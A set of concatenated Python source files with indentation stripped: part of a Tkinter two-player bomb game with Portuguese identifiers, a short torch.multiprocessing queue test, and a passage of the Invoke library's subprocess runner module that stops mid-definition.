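    # Example of the conversion below: transform(3725) -> "01:02:05" (1 hour, 2 minutes, 5 seconds).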
def transform(self,segundos):
segundos_rest = segundos % 86400
horas = segundos_rest // 3600
segundos_rest = segundos_rest % 3600
minutos = segundos_rest // 60
segundos_rest = segundos_rest % 60
if len(str(horas)) == 1:
horas="0"+str(horas)
else:
horas=str(horas)
if len(str(minutos)) == 1:
minutos="0"+str(minutos)
else:
minutos=str(minutos)
if len(str(segundos_rest)) == 1:
segundos_rest="0"+str(segundos_rest)
else:
segundos_rest=str(segundos_rest)
return horas+":"+minutos+":"+segundos_rest
def cima(self,event):
testando = self.checaposicao(self.img.winfo_x(),self.img.winfo_y()-32,"x")
if testando == True:
if event != "cima":
self.master.cli.enviar("001")
if self.play == "primeiro":
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play11.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play21.gif'))
else:
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play21.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play11.gif'))
self.img.configure(image=img2)
self.img.image = img2
self.lastx=self.img.winfo_x()
self.lasty=self.img.winfo_y()-32
self.img.place(x=self.img.winfo_x(),y=self.img.winfo_y()-32)
elif testando == "morreu1" or testando == "morreu2":
if event != "cima":
self.master.cli.enviar("001")
if self.play == "primeiro":
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play11.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play21.gif'))
else:
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play21.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play11.gif'))
self.img.configure(image=img2)
self.img.image = img2
self.lastx=self.img.winfo_x()
self.lasty=self.img.winfo_y()-32
self.img.place(x=self.img.winfo_x(),y=self.img.winfo_y()-32)
t1 = threading.Thread(target=self.morreu, args=[testando])
t1.start()
self.master.update()
def esquerda(self,event):
testando = self.checaposicao(self.img.winfo_x()-32,self.img.winfo_y(),"y")
if testando == True:
if event != "esquerda":
self.master.cli.enviar("010")
if self.play == "primeiro":
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play14.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play24.gif'))
else:
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play24.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play14.gif'))
self.img.configure(image=img2)
self.img.image = img2
self.lastx=self.img.winfo_x()-32
self.lasty=self.img.winfo_y()
self.img.place(x=self.img.winfo_x()-32,y=self.img.winfo_y())
elif testando == "morreu1" or testando == "morreu2":
if event != "esquerda":
self.master.cli.enviar("010")
if self.play == "primeiro":
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play14.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play24.gif'))
else:
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play24.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play14.gif'))
self.img.configure(image=img2)
self.img.image = img2
self.lastx=self.img.winfo_x()-32
self.lasty=self.img.winfo_y()
self.img.place(x=self.img.winfo_x()-32,y=self.img.winfo_y())
t1 = threading.Thread(target=self.morreu, args=[testando])
t1.start()
self.master.update()
def direita(self,event):
testando = self.checaposicao(self.img.winfo_x()+32,self.img.winfo_y(),"y")
if testando == True:
if event != "direita":
self.master.cli.enviar("011")
if self.play == "primeiro":
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play12.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play22.gif'))
else:
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play22.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play12.gif'))
self.img.configure(image=img2)
self.img.image = img2
self.lastx=self.img.winfo_x()+32
self.lasty=self.img.winfo_y()
self.img.place(x=self.img.winfo_x()+32,y=self.img.winfo_y())
elif testando == "morreu1" or testando == "morreu2":
if event != "direita":
self.master.cli.enviar("011")
if self.play == "primeiro":
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play12.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play22.gif'))
else:
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play22.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play12.gif'))
self.img.configure(image=img2)
self.img.image = img2
self.lastx=self.img.winfo_x()+32
self.lasty=self.img.winfo_y()
self.img.place(x=self.img.winfo_x()+32,y=self.img.winfo_y())
t1 = threading.Thread(target=self.morreu, args=[testando])
t1.start()
self.master.update()
def bomba(self,event):
if self.testabomba == 1:
if event != "bomba":
self.master.cli.enviar("100")
t1 = Thread(target=self.bomba2)
t1.start()
def bomba2(self):
self.testabomba=0
self.img2 = ImageTk.PhotoImage(Image.open('/usr/bin/bomba.gif'))
self.img3 = Label(self.master,bg='green',image=self.img2)
self.img3.image=self.img2
self.img3.place(x=self.lastx,y=self.lasty)
lastx = self.lastx
lasty = self.lasty
self.master.update()
teste = lastx / 32
teste2 = lasty / 32
self.master.blocos.append((teste,teste2))
time.sleep(2)
self.master.fogo.append(self.master._widgets[teste2][teste])
self.master._widgets[teste2][teste].configure(bg="red")
veri=True
if (lastx+32) <= 416:
for x in range(32,417,64):
for y in range(64,417,64):
if lastx == x and lasty == y:
veri=False
if veri:
self.master.fogo.append(self.master._widgets[teste2][teste+1])
self.master._widgets[teste2][teste+1].configure(bg="red")
else:
veri=False
veri2=True
if (lastx-32) >= 32:
for x in range(32,417,64):
for y in range(64,417,64):
if lastx == x and lasty == y:
veri2=False
if veri2:
self.master.fogo.append(self.master._widgets[teste2][teste-1])
self.master._widgets[teste2][teste-1].configure(bg="red")
else:
veri2=False
veri3=True
if (lasty+32) <= 416:
for x in range(64,417,64):
for y in range(32,417,64):
if lastx == x and lasty == y:
veri3=False
if veri3:
self.master.fogo.append(self.master._widgets[teste2+1][teste])
self.master._widgets[teste2+1][teste].configure(bg="red")
else:
veri3=False
veri4=True
if (lasty-32) >= 32:
for x in range(64,417,64):
for y in range(32,417,64):
if lastx == x and lasty == y:
veri4=False
if veri4:
self.master.fogo.append(self.master._widgets[teste2-1][teste])
self.master._widgets[teste2-1][teste].configure(bg="red")
else:
veri4=False
self.img3.destroy()
self.testabomba=1
try:
self.master.blocos.remove((teste,teste2))
except:
pass
try:
self.master.blocos.remove((teste+1,teste2))
except:
pass
try:
self.master.blocos.remove((teste-1,teste2))
except:
pass
try:
self.master.blocos.remove((teste,teste2+1))
except:
pass
try:
self.master.blocos.remove((teste,teste2-1))
except:
pass
try:
testando=self.master.play1.checaposicao(self.master.play1.lastx,self.master.play1.lasty,"parado")
if testando == "morreu1" or testando == "morreu2":
t1 = threading.Thread(target=self.morreu, args=[testando])
t1.start()
except:
pass
try:
testando=self.master.play2.checaposicao(self.master.play2.lastx,self.master.play2.lasty,"parado")
if testando == "morreu1" or testando == "morreu2":
t1 = threading.Thread(target=self.morreu, args=[testando])
t1.start()
except:
pass
#self.checaposicao(self.lastx,self.lasty, "parado")
time.sleep(1)
if veri:
self.master.fogo.remove(self.master._widgets[teste2][teste+1])
self.master._widgets[teste2][teste+1].configure(bg="green")
if veri2:
self.master.fogo.remove(self.master._widgets[teste2][teste-1])
self.master._widgets[teste2][teste-1].configure(bg="green")
if veri3:
self.master.fogo.remove(self.master._widgets[teste2+1][teste])
self.master._widgets[teste2+1][teste].configure(bg="green")
if veri4:
self.master.fogo.remove(self.master._widgets[teste2-1][teste])
self.master._widgets[teste2-1][teste].configure(bg="green")
self.master.fogo.remove(self.master._widgets[teste2][teste])
self.master._widgets[teste2][teste].configure(bg="green")
return True
def checaposicao(self, x, y, caminho):
#print self.blocos
#print self.master.sou,x,y, caminho
if x < 32 or y > 416 or x > 416 or y < 32:
return False
elif x >= 32 and y >= 32:
for xy in self.master.blocos:
#print x,y
if x > (xy[0]-1) * 32 and x < (xy[0]+1) * 32 and y > (xy[1]-1)*32 and y < (xy[1]+1)*32:
return False
teste,teste2 = self.master.grid_location(x,y)
if caminho == "x":
for i in range(32,417,64):
if x == i:
if self.master._widgets[teste2+1][teste+1] in self.master.fogo:
#self.img.destroy()
if self.master.sou == "primeiro" and self.outro == None:
return "morreu1"
elif self.master.sou == "segundo" and self.outro != None:
return "morreu1"
else:
return "morreu2"
return True
elif caminho == "y":
for i in range(32,417,64):
if y == i:
if self.master._widgets[teste2+1][teste+1] in self.master.fogo:
#self.img.destroy()
if self.master.sou == "primeiro" and self.outro == None:
return "morreu1"
elif self.master.sou == "segundo" and self.outro != None:
return "morreu1"
else:
return "morreu2"
return True
elif caminho == "parado":
if self.master._widgets[teste2+1][teste+1] in self.master.fogo:
#self.img.destroy()
if self.master.sou == "primeiro" and self.outro == None:
return "morreu1"
elif self.master.sou == "segundo" and self.outro != None:
return "morreu1"
else:
return "morreu2"
else:
return True
|
d_mp_test_2.py
|
from torch.multiprocessing import Queue, Process
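# torch.multiprocessing mirrors the standard library's multiprocessing API, so Queue and
# Process behave as usual here, while additionally supporting shared CUDA tensors.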
def proc_a(queue):
data = 1000
queue.put(data)
def proc_b(queue):
data = queue.get()
print(data)
if __name__ == '__main__':
# b = [(1, 2), (20, 30), (200, 300)]
# print(list(zip(*b)))
queue = Queue()
p1 = Process(target=proc_a, args=(queue,))
p2 = Process(target=proc_b, args=(queue,))
p1.start()
p2.start()
p1.join()
p2.join()
|
runners.py
|
# -*- coding: utf-8 -*-
import locale
import os
import struct
from subprocess import Popen, PIPE
import sys
import threading
import time
# Import some platform-specific things at top level so they can be mocked for
# tests.
try:
import pty
except ImportError:
pty = None
try:
import fcntl
except ImportError:
fcntl = None
try:
import termios
except ImportError:
termios = None
from .exceptions import (
UnexpectedExit, Failure, ThreadException, WatcherError,
)
from .platform import (
WINDOWS, pty_size, character_buffered, ready_for_reading, bytes_to_read,
)
from .util import has_fileno, isatty, ExceptionHandlingThread
try:
from .vendor import six
except ImportError:
import six
class Runner(object):
"""
Partially-abstract core command-running API.
This class is not usable by itself and must be subclassed, implementing a
number of methods such as `start`, `wait` and `returncode`. For a subclass
implementation example, see the source code for `.Local`.
"""
read_chunk_size = 1000
input_sleep = 0.01
def __init__(self, context):
"""
Create a new runner with a handle on some `.Context`.
:param context:
a `.Context` instance, used to transmit default options and provide
access to other contextualized information (e.g. a remote-oriented
`.Runner` might want a `.Context` subclass holding info about
hostnames and ports.)
.. note::
The `.Context` given to `.Runner` instances **must** contain
default config values for the `.Runner` class in question. At a
minimum, this means values for each of the default
`.Runner.run` keyword arguments such as ``echo`` and ``warn``.
:raises exceptions.ValueError:
if not all expected default values are found in ``context``.
"""
#: The `.Context` given to the same-named argument of `__init__`.
self.context = context
#: A `threading.Event` signaling program completion.
#:
#: Typically set after `wait` returns. Some IO mechanisms rely on this
#: to know when to exit an infinite read loop.
self.program_finished = threading.Event()
# I wish Sphinx would organize all class/instance attrs in the same
# place. If I don't do this here, it goes 'class vars -> __init__
# docstring -> instance vars' :( TODO: consider just merging class and
# __init__ docstrings, though that's annoying too.
#: How many bytes (at maximum) to read per iteration of stream reads.
self.read_chunk_size = self.__class__.read_chunk_size
# Ditto re: declaring this in 2 places for doc reasons.
#: How many seconds to sleep on each iteration of the stdin read loop
#: and other otherwise-fast loops.
self.input_sleep = self.__class__.input_sleep
#: Whether pty fallback warning has been emitted.
self.warned_about_pty_fallback = False
#: A list of `.StreamWatcher` instances for use by `respond`. Is filled
#: in at runtime by `run`.
self.watchers = []
def run(self, command, **kwargs):
"""
Execute ``command``, returning an instance of `Result`.
.. note::
All kwargs will default to the values found in this instance's
`~.Runner.context` attribute, specifically in its configuration's
``run`` subtree (e.g. ``run.echo`` provides the default value for
the ``echo`` keyword, etc). The base default values are described
in the parameter list below.
:param str command: The shell command to execute.
:param str shell: Which shell binary to use. Default: ``/bin/bash``.
:param bool warn:
Whether to warn and continue, instead of raising
`.UnexpectedExit`, when the executed command exits with a
nonzero status. Default: ``False``.
.. note::
This setting has no effect on exceptions, which will still be
raised, typically bundled in `.ThreadException` objects if they
were raised by the IO worker threads.
Similarly, `.WatcherError` exceptions raised by
`.StreamWatcher` instances will also ignore this setting, and
will usually be bundled inside `.Failure` objects (in order to
preserve the execution context).
:param hide:
Allows the caller to disable ``run``'s default behavior of copying
the subprocess' stdout and stderr to the controlling terminal.
Specify ``hide='out'`` (or ``'stdout'``) to hide only the stdout
stream, ``hide='err'`` (or ``'stderr'``) to hide only stderr, or
``hide='both'`` (or ``True``) to hide both streams.
The default value is ``None``, meaning to print everything;
``False`` will also disable hiding.
.. note::
Stdout and stderr are always captured and stored in the
``Result`` object, regardless of ``hide``'s value.
.. note::
``hide=True`` will also override ``echo=True`` if both are
given (either as kwargs or via config/CLI).
:param bool pty:
By default, ``run`` connects directly to the invoked process and
reads its stdout/stderr streams. Some programs will buffer (or even
behave) differently in this situation compared to using an actual
terminal or pseudoterminal (pty). To use a pty instead of the
default behavior, specify ``pty=True``.
.. warning::
Due to their nature, ptys have a single output stream, so the
ability to tell stdout apart from stderr is **not possible**
when ``pty=True``. As such, all output will appear on
``out_stream`` (see below) and be captured into the ``stdout``
result attribute. ``err_stream`` and ``stderr`` will always be
empty when ``pty=True``.
:param bool fallback:
Controls auto-fallback behavior re: problems offering a pty when
``pty=True``. Whether this has any effect depends on the specific
`Runner` subclass being invoked. Default: ``True``.
:param bool echo:
Controls whether `.run` prints the command string to local stdout
prior to executing it. Default: ``False``.
.. note::
``hide=True`` will override ``echo=True`` if both are given.
:param dict env:
            By default, subprocesses receive a copy of Invoke's own environment
(i.e. ``os.environ``). Supply a dict here to update that child
environment.
For example, ``run('command', env={'PYTHONPATH':
'/some/virtual/env/maybe'})`` would modify the ``PYTHONPATH`` env
var, with the rest of the child's env looking identical to the
parent.
.. seealso:: ``replace_env`` for changing 'update' to 'replace'.
:param bool replace_env:
When ``True``, causes the subprocess to receive the dictionary
given to ``env`` as its entire shell environment, instead of
updating a copy of ``os.environ`` (which is the default behavior).
Default: ``False``.
:param str encoding:
Override auto-detection of which encoding the subprocess is using
for its stdout/stderr streams (which defaults to the return value
of `default_encoding`).
:param out_stream:
A file-like stream object to which the subprocess' standard output
should be written. If ``None`` (the default), ``sys.stdout`` will
be used.
:param err_stream:
Same as ``out_stream``, except for standard error, and defaulting
to ``sys.stderr``.
:param in_stream:
A file-like stream object to be used as the subprocess' standard
input. If ``None`` (the default), ``sys.stdin`` will be used.
:param list watchers:
A list of `.StreamWatcher` instances which will be used to scan the
program's ``stdout`` or ``stderr`` and may write into its ``stdin``
(typically ``str`` or ``bytes`` objects depending on Python
version) in response to patterns or other heuristics.
See :doc:`/concepts/watchers` for details on this functionality.
Default: ``[]``.
:param bool echo_stdin:
Whether to write data from ``in_stream`` back to ``out_stream``.
In other words, in normal interactive usage, this parameter
controls whether Invoke mirrors what you type back to your
terminal.
By default (when ``None``), this behavior is triggered by the
following:
* Not using a pty to run the subcommand (i.e. ``pty=False``),
as ptys natively echo stdin to stdout on their own;
* And when the controlling terminal of Invoke itself (as per
``in_stream``) appears to be a valid terminal device or TTY.
(Specifically, when `~invoke.util.isatty` yields a ``True``
result when given ``in_stream``.)
.. note::
This property tends to be ``False`` when piping another
program's output into an Invoke session, or when running
Invoke within another program (e.g. running Invoke from
itself).
If both of those properties are true, echoing will occur; if either
is false, no echoing will be performed.
When not ``None``, this parameter will override that auto-detection
and force, or disable, echoing.
:returns:
`Result`, or a subclass thereof.
:raises:
`.UnexpectedExit`, if the command exited nonzero and
``warn`` was ``False``.
:raises:
`.Failure`, if the command didn't even exit cleanly, e.g. if a
`.StreamWatcher` raised `.WatcherError`.
:raises:
`.ThreadException` (if the background I/O threads encountered
exceptions other than `.WatcherError`).
"""
try:
return self._run_body(command, **kwargs)
finally:
self.stop()
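# Illustrative usage sketch for `run` (not part of this module's API docs;
# the concrete command and keyword choices below are examples only):
#
#     runner = Local(context)
#     result = runner.run("ls /tmp", hide="stdout", warn=True)
#     if result.failed:
#         print("exit {0}: {1}".format(result.exited, result.stderr))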
def _run_body(self, command, **kwargs):
# Normalize kwargs w/ config
opts, out_stream, err_stream, in_stream = self._run_opts(kwargs)
shell = opts['shell']
# Environment setup
env = self.generate_env(opts['env'], opts['replace_env'])
# Echo running command
if opts['echo']:
print("\033[1;37m{0}\033[0m".format(command))
# Start executing the actual command (runs in background)
self.start(command, shell, env)
# Arrive at final encoding if neither config nor kwargs had one
self.encoding = opts['encoding'] or self.default_encoding()
# Set up IO thread parameters (format - body_func: {kwargs})
stdout, stderr = [], []
thread_args = {
self.handle_stdout: {
'buffer_': stdout,
'hide': 'stdout' in opts['hide'],
'output': out_stream,
},
# TODO: make this & related functionality optional, for users who
# don't care about autoresponding & are encountering issues with
# the stdin mirroring? Downside is it fragments expected behavior &
# puts folks with true interactive use cases in a different support
# class.
self.handle_stdin: {
'input_': in_stream,
'output': out_stream,
'echo': opts['echo_stdin'],
}
}
if not self.using_pty:
thread_args[self.handle_stderr] = {
'buffer_': stderr,
'hide': 'stderr' in opts['hide'],
'output': err_stream,
}
# Kick off IO threads
self.threads = {}
exceptions = []
for target, kwargs in six.iteritems(thread_args):
t = ExceptionHandlingThread(target=target, kwargs=kwargs)
self.threads[target] = t
t.start()
# Wait for completion, then tie things off & obtain result
# And make sure we perform that tying off even if things asplode.
exception = None
while True:
try:
self.wait()
break # done waiting!
# NOTE: we handle all this now instead of at
# actual-exception-handling time because otherwise the stdout/err
# reader threads may block until the subprocess exits.
# TODO: honor other signals sent to our own process and transmit
# them to the subprocess before handling 'normally'.
except KeyboardInterrupt as e:
self.send_interrupt(e)
# NOTE: no break; we want to return to self.wait()
except BaseException as e: # Want to handle SystemExit etc still
# Store exception for post-shutdown reraise
exception = e
# Break out of return-to-wait() loop - we want to shut down
break
# Inform stdin-mirroring worker to stop its eternal looping
self.program_finished.set()
# Join threads, setting a timeout if necessary
for target, thread in six.iteritems(self.threads):
thread.join(self._thread_timeout(target))
e = thread.exception()
if e is not None:
exceptions.append(e)
# If we got a main-thread exception while wait()ing, raise it now that
# we've closed our worker threads.
if exception is not None:
raise exception
# Strip out WatcherError from any thread exceptions; they are bundled
# into Failure handling at the end.
watcher_errors = []
thread_exceptions = []
for exception in exceptions:
real = exception.value
if isinstance(real, WatcherError):
watcher_errors.append(real)
else:
thread_exceptions.append(exception)
# If any exceptions appeared inside the threads, raise them now as an
# aggregate exception object.
if thread_exceptions:
raise ThreadException(thread_exceptions)
# At this point, we had enough success that we want to be returning or
# raising detailed info about our execution; so we generate a Result.
stdout = ''.join(stdout)
stderr = ''.join(stderr)
if WINDOWS:
# "Universal newlines" - replace all standard forms of
# newline with \n. This is not technically Windows related
# (\r as newline is an old Mac convention) but we only apply
# the translation for Windows as that's the only platform
# it is likely to matter for these days.
stdout = stdout.replace("\r\n", "\n").replace("\r", "\n")
stderr = stderr.replace("\r\n", "\n").replace("\r", "\n")
# Get return/exit code, unless there were WatcherErrors to handle.
# NOTE: In that case, returncode() may block waiting on the process
# (which may be waiting for user input). Since most WatcherError
# situations lack a useful exit code anyways, skipping this doesn't
# really hurt any.
exited = None if watcher_errors else self.returncode()
# Obtain actual result
result = self.generate_result(
command=command,
shell=shell,
env=env,
stdout=stdout,
stderr=stderr,
exited=exited,
pty=self.using_pty,
hide=opts['hide'],
)
# Any presence of WatcherError from the threads indicates a watcher was
# upset and aborted execution; make a generic Failure out of it and
# raise that.
if watcher_errors:
# TODO: ambiguity exists if we somehow get WatcherError in *both*
# threads...as unlikely as that would normally be.
raise Failure(result, reason=watcher_errors[0])
if not (result or opts['warn']):
raise UnexpectedExit(result)
return result
def _run_opts(self, kwargs):
"""
Unify `run` kwargs with config options to arrive at local options.
:returns:
Four-tuple of ``(opts_dict, stdout_stream, stderr_stream,
stdin_stream)``.
"""
opts = {}
for key, value in six.iteritems(self.context.config.run):
runtime = kwargs.pop(key, None)
opts[key] = value if runtime is None else runtime
# Handle invalid kwarg keys (anything left in kwargs).
# Act like a normal function would, i.e. TypeError
if kwargs:
err = "run() got an unexpected keyword argument '{0}'"
raise TypeError(err.format(list(kwargs.keys())[0]))
# If hide was True, turn off echoing
if opts['hide'] is True:
opts['echo'] = False
# Then normalize 'hide' from one of the various valid input values,
# into a stream-names tuple.
opts['hide'] = normalize_hide(opts['hide'])
# Derive stream objects
out_stream = opts['out_stream']
if out_stream is None:
out_stream = sys.stdout
err_stream = opts['err_stream']
if err_stream is None:
err_stream = sys.stderr
in_stream = opts['in_stream']
if in_stream is None:
in_stream = sys.stdin
# Determine pty or no
self.using_pty = self.should_use_pty(opts['pty'], opts['fallback'])
if opts['watchers']:
self.watchers = opts['watchers']
return opts, out_stream, err_stream, in_stream
def _thread_timeout(self, target):
# Add a timeout to out/err thread joins when it looks like they're not
# dead but their counterpart is dead; this indicates issue #351 (fixed
# by #432) where the subproc may hang because its stdout (or stderr) is
# no longer being consumed by the dead thread (and a pipe is filling
# up.) In that case, the non-dead thread is likely to block forever on
# a `recv` unless we add this timeout.
if target == self.handle_stdin:
return None
opposite = self.handle_stderr
if target == self.handle_stderr:
opposite = self.handle_stdout
if opposite in self.threads and self.threads[opposite].is_dead:
return 1
return None
def generate_result(self, **kwargs):
"""
Create & return a suitable `Result` instance from the given ``kwargs``.
Subclasses may wish to override this in order to manipulate things or
generate a `Result` subclass (e.g. ones containing additional metadata
besides the default).
"""
return Result(**kwargs)
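# Sketch of the kind of override described above; `TimedLocal`,
# `TimedResult` and the extra timestamp field are hypothetical, not part
# of this module:
#
#     class TimedLocal(Local):
#         def generate_result(self, **kwargs):
#             kwargs['finished_at'] = time.time()
#             return TimedResult(**kwargs)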
def read_proc_output(self, reader):
"""
Iteratively read & decode bytes from a subprocess' out/err stream.
:param reader:
A literal reader function/partial, wrapping the actual stream
object in question, which takes a number of bytes to read, and
returns that many bytes (or ``None``).
``reader`` should be a reference to either `read_proc_stdout` or
`read_proc_stderr`, which perform the actual, platform/library
specific read calls.
:returns:
A generator yielding Unicode strings (`unicode` on Python 2; `str`
on Python 3).
Specifically, each resulting string is the result of decoding
`read_chunk_size` bytes read from the subprocess' out/err stream.
"""
# NOTE: Typically, reading from any stdout/err (local, remote or
# otherwise) can be thought of as "read until you get nothing back".
# This is preferable over "wait until an out-of-band signal claims the
# process is done running" because sometimes that signal will appear
# before we've actually read all the data in the stream (i.e.: a race
# condition).
while True:
data = reader(self.read_chunk_size)
if not data:
break
yield self.decode(data)
def write_our_output(self, stream, string):
"""
Write ``string`` to ``stream``.
Also calls ``.flush()`` on ``stream`` to ensure that real terminal
streams don't buffer.
:param stream:
A file-like stream object, mapping to the ``out_stream`` or
``err_stream`` parameters of `run`.
:param string: A Unicode string object.
:returns: ``None``.
"""
# Encode under Python 2 only, because of the common problem where
# sys.stdout/err on Python 2 end up using sys.getdefaultencoding(),
# which is frequently NOT the same thing as the real local terminal
# encoding (reflected as sys.stdout.encoding). I.e. even when
# sys.stdout.encoding is UTF-8, ascii is still actually used, and
# explodes.
# Python 3 doesn't have this problem, so we delegate encoding to the
# io.*Writer classes involved.
if six.PY2:
# TODO: split up self.encoding, only use the one for 'local
# encoding' here.
string = string.encode(self.encoding)
stream.write(string)
stream.flush()
def _handle_output(self, buffer_, hide, output, reader):
# TODO: store un-decoded/raw bytes somewhere as well...
for data in self.read_proc_output(reader):
# Echo to local stdout if necessary
# TODO: should we rephrase this as "if you want to hide, give me a
# dummy output stream, e.g. something like /dev/null"? Otherwise, a
# combo of 'hide=stdout' + 'here is an explicit out_stream' means
# out_stream is never written to, and that seems...odd.
if not hide:
self.write_our_output(stream=output, string=data)
# Store in shared buffer so main thread can do things with the
# result after execution completes.
# NOTE: this is threadsafe insofar as no reading occurs until after
# the thread is join()'d.
buffer_.append(data)
# Run our specific buffer through the autoresponder framework
self.respond(buffer_)
def handle_stdout(self, buffer_, hide, output):
"""
Read process' stdout, storing into a buffer & printing/parsing.
Intended for use as a thread target. Only terminates when all stdout
from the subprocess has been read.
:param list buffer_: The capture buffer shared with the main thread.
:param bool hide: Whether or not to replay data into ``output``.
:param output:
Output stream (file-like object) to write data into when not
hiding.
:returns: ``None``.
"""
self._handle_output(
buffer_,
hide,
output,
reader=self.read_proc_stdout,
)
def handle_stderr(self, buffer_, hide, output):
"""
Read process' stderr, storing into a buffer & printing/parsing.
Identical to `handle_stdout` except for the stream read from; see its
docstring for API details.
"""
self._handle_output(
buffer_,
hide,
output,
reader=self.read_proc_stderr,
)
def read_our_stdin(self, input_):
"""
Read & decode bytes from a local stdin stream.
:param input_:
Actual stream object to read from. Maps to ``in_stream`` in `run`,
so will often be ``sys.stdin``, but might be any stream-like
object.
:returns:
A Unicode string, the result of decoding the read bytes (this might
be the empty string if the pipe has closed/reached EOF); or
``None`` if stdin wasn't ready for reading yet.
"""
# TODO: consider moving the character_buffered contextmanager call in
# here? Downside is it would be flipping those switches for every byte
# read instead of once per session, which could be costly (?).
bytes_ = None
if ready_for_reading(input_):
bytes_ = input_.read(bytes_to_read(input_))
# Decode if it appears to be binary-type. (From real terminal
# streams, usually yes; from file-like objects, often no.)
if bytes_ and isinstance(bytes_, six.binary_type):
# TODO: will decoding 1 byte at a time break multibyte
# character encodings? How to square interactivity with that?
bytes_ = self.decode(bytes_)
return bytes_
def handle_stdin(self, input_, output, echo):
"""
Read local stdin, copying into process' stdin as necessary.
Intended for use as a thread target.
.. note::
Because real terminal stdin streams have no well-defined "end", if
such a stream is detected (based on existence of a callable
``.fileno()``) this method will wait until `program_finished` is
set, before terminating.
When the stream doesn't appear to be from a terminal, the same
semantics as `handle_stdout` are used - the stream is simply
``read()`` from until it returns an empty value.
:param input_: Stream (file-like object) from which to read.
:param output: Stream (file-like object) to which echoing may occur.
:param bool echo: User override option for stdin-stdout echoing.
:returns: ``None``.
"""
# TODO: reinstate lock/whatever thread logic from fab v1 which prevents
# reading from stdin while other parts of the code are prompting for
# runtime passwords? (search for 'input_enabled')
# TODO: fabric#1339 is strongly related to this, if it's not literally
# exposing some regression in Fabric 1.x itself.
with character_buffered(input_):
while True:
data = self.read_our_stdin(input_)
if data:
# Mirror what we just read to process' stdin.
# We perform an encode so Python 3 gets bytes (streams +
# str's in Python 3 == no bueno) but skip the decode step,
# since there's presumably no need (nobody's interacting
# with this data programmatically).
self.write_proc_stdin(data)
# Also echo it back to local stdout (or whatever
# out_stream is set to) when necessary.
if echo is None:
echo = self.should_echo_stdin(input_, output)
if echo:
self.write_our_output(stream=output, string=data)
# Empty string/char/byte != None. Can't just use 'else' here.
elif data is not None:
# When reading from file-like objects that aren't "real"
# terminal streams, an empty byte signals EOF.
break
# Dual all-done signals: program being executed is done
# running, *and* we don't seem to be reading anything out of
# stdin. (NOTE: If we only test the former, we may encounter
# race conditions re: unread stdin.)
if self.program_finished.is_set() and not data:
break
# Take a nap so we're not chewing CPU.
time.sleep(self.input_sleep)
def should_echo_stdin(self, input_, output):
"""
Determine whether data read from ``input_`` should echo to ``output``.
Used by `handle_stdin`; tests attributes of ``input_`` and ``output``.
:param input_: Input stream (file-like object).
:param output: Output stream (file-like object).
:returns: A ``bool``.
"""
return (not self.using_pty) and isatty(input_)
def respond(self, buffer_):
"""
Write to the program's stdin in response to patterns in ``buffer_``.
The patterns and responses are driven by the `.StreamWatcher` instances
from the ``watchers`` kwarg of `run` - see :doc:`/concepts/watchers`
for a conceptual overview.
:param list buffer_:
The capture buffer for this thread's particular IO stream.
:returns: ``None``.
"""
# Join buffer contents into a single string; without this,
# StreamWatcher subclasses can't do things like iteratively scan for
# pattern matches.
# NOTE: using string.join should be "efficient enough" for now, re:
# speed and memory use. Should that become false, consider using
# StringIO or cStringIO (tho the latter doesn't do Unicode well?) which
# is apparently even more efficient.
stream = u''.join(buffer_)
for watcher in self.watchers:
for response in watcher.submit(stream):
self.write_proc_stdin(response)
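# Hedged usage sketch: assuming a Responder-style `StreamWatcher` (pattern ->
# canned reply) is available, it would be wired in via the `watchers` kwarg
# of `run`; the pattern and response strings here are examples:
#
#     sudo_pass = Responder(pattern=r"\[sudo\] password", response="secret\n")
#     runner.run("sudo whoami", watchers=[sudo_pass])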
def generate_env(self, env, replace_env):
"""
Return a suitable environment dict based on user input & behavior.
:param dict env: Dict supplying overrides or full env, depending.
:param bool replace_env:
Whether ``env`` updates, or is used in place of, the value of
`os.environ`.
:returns: A dictionary of shell environment vars.
"""
return env if replace_env else dict(os.environ, **env)
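# For example, with os.environ == {'HOME': '/home/me'}:
#   generate_env({'FOO': 'bar'}, replace_env=False) -> {'HOME': '/home/me', 'FOO': 'bar'}
#   generate_env({'FOO': 'bar'}, replace_env=True)  -> {'FOO': 'bar'}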
def should_use_pty(self, pty, fallback):
"""
Should execution attempt to use a pseudo-terminal?
:param bool pty:
Whether the user explicitly asked for a pty.
:param bool fallback:
Whether falling back to non-pty execution should be allowed, in
situations where ``pty=True`` but a pty could not be allocated.
"""
# NOTE: fallback not used: no falling back implemented by default.
return pty
@property
def has_dead_threads(self):
"""
Detect whether any IO threads appear to have terminated unexpectedly.
Used during process-completion waiting (in `wait`) to ensure we don't
deadlock our child process if our IO processing threads have
errored/died.
:returns:
``True`` if any threads appear to have terminated with an
exception, ``False`` otherwise.
"""
return any(x.is_dead for x in self.threads.values())
def wait(self):
"""
Block until the running command appears to have exited.
:returns: ``None``.
"""
while True:
proc_finished = self.process_is_finished
dead_threads = self.has_dead_threads
if proc_finished or dead_threads:
break
time.sleep(self.input_sleep)
def write_proc_stdin(self, data):
